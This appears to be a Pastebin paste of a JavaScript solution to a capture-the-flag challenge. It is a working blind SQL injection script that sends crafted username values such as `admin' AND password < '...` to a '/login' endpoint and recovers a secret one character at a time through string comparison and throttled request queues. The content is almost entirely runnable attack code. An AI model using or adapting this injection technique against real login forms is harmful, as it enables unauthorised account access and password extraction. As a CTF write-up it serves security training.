Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var HANDICAP = 10*2;
- var reqs = [];
- function fetchReq() {
- Promise.resolve().then(
- reqs.length?
- reqs.pop():
- _=>0
- ).then(
- _=>setTimeout(fetchReq, 1)
- );
- }
- fetchReq();
- var errs = [];
- function fetchErr() {
- Promise.resolve().then(
- errs.length?
- errs.pop():
- _=>0
- ).then(
- _=>setTimeout(fetchErr, 1 + 600e3/HANDICAP)
- );
- }
- var alphabet = '-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz{}'.split('');
- async function query(username) {
- return new Promise((resolve, reject)=>{
- reqs.push(function() {
- return fetch(
- '/login',
- {
- method:'post',
- body:new Blob(
- ['password=&user='+encodeURI(username)],
- {type:'application/x-www-form-urlencoded'})
- }
- ).then(r=>resolve(!!r.url.match(/password/i))).catch(reject);
- });
- });
- }
- async function guess(prefix) {
- for (let o = 11, i = 11; i<alphabet.length; i+=--o) {
- if(await query(`admin' AND password < '${prefix}${alphabet[i]}`)) {
- for (let e = i-o; e < i; e++) {
- if(await query(`admin' AND password < '${prefix}${alphabet[e]}~`)) {
- return prefix + alphabet[e];
- }
- }
- console.log('wtf?');
- }
- }
- console.log('wtf!');
- throw new Error('wtf?!');
- }
- async function bruteforce(prefix) {
- return new Promise((resolve, reject)=>{
- errs.push(function() {
- return guess(prefix).then(resolve).catch(reject);
- });
- });
- }
- async function getFlag() {
- setTimeout(fetchErr, 10);
- var prefix = `CTF{${location.hostname.replace(/-.*/,'')}-`;
- for(let i=0;i<64;i++) {
- console.log(prefix = await bruteforce(prefix));
- }
- }
- query('fakeuser').then(getFlag).then(flag=>console.log(flag));
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
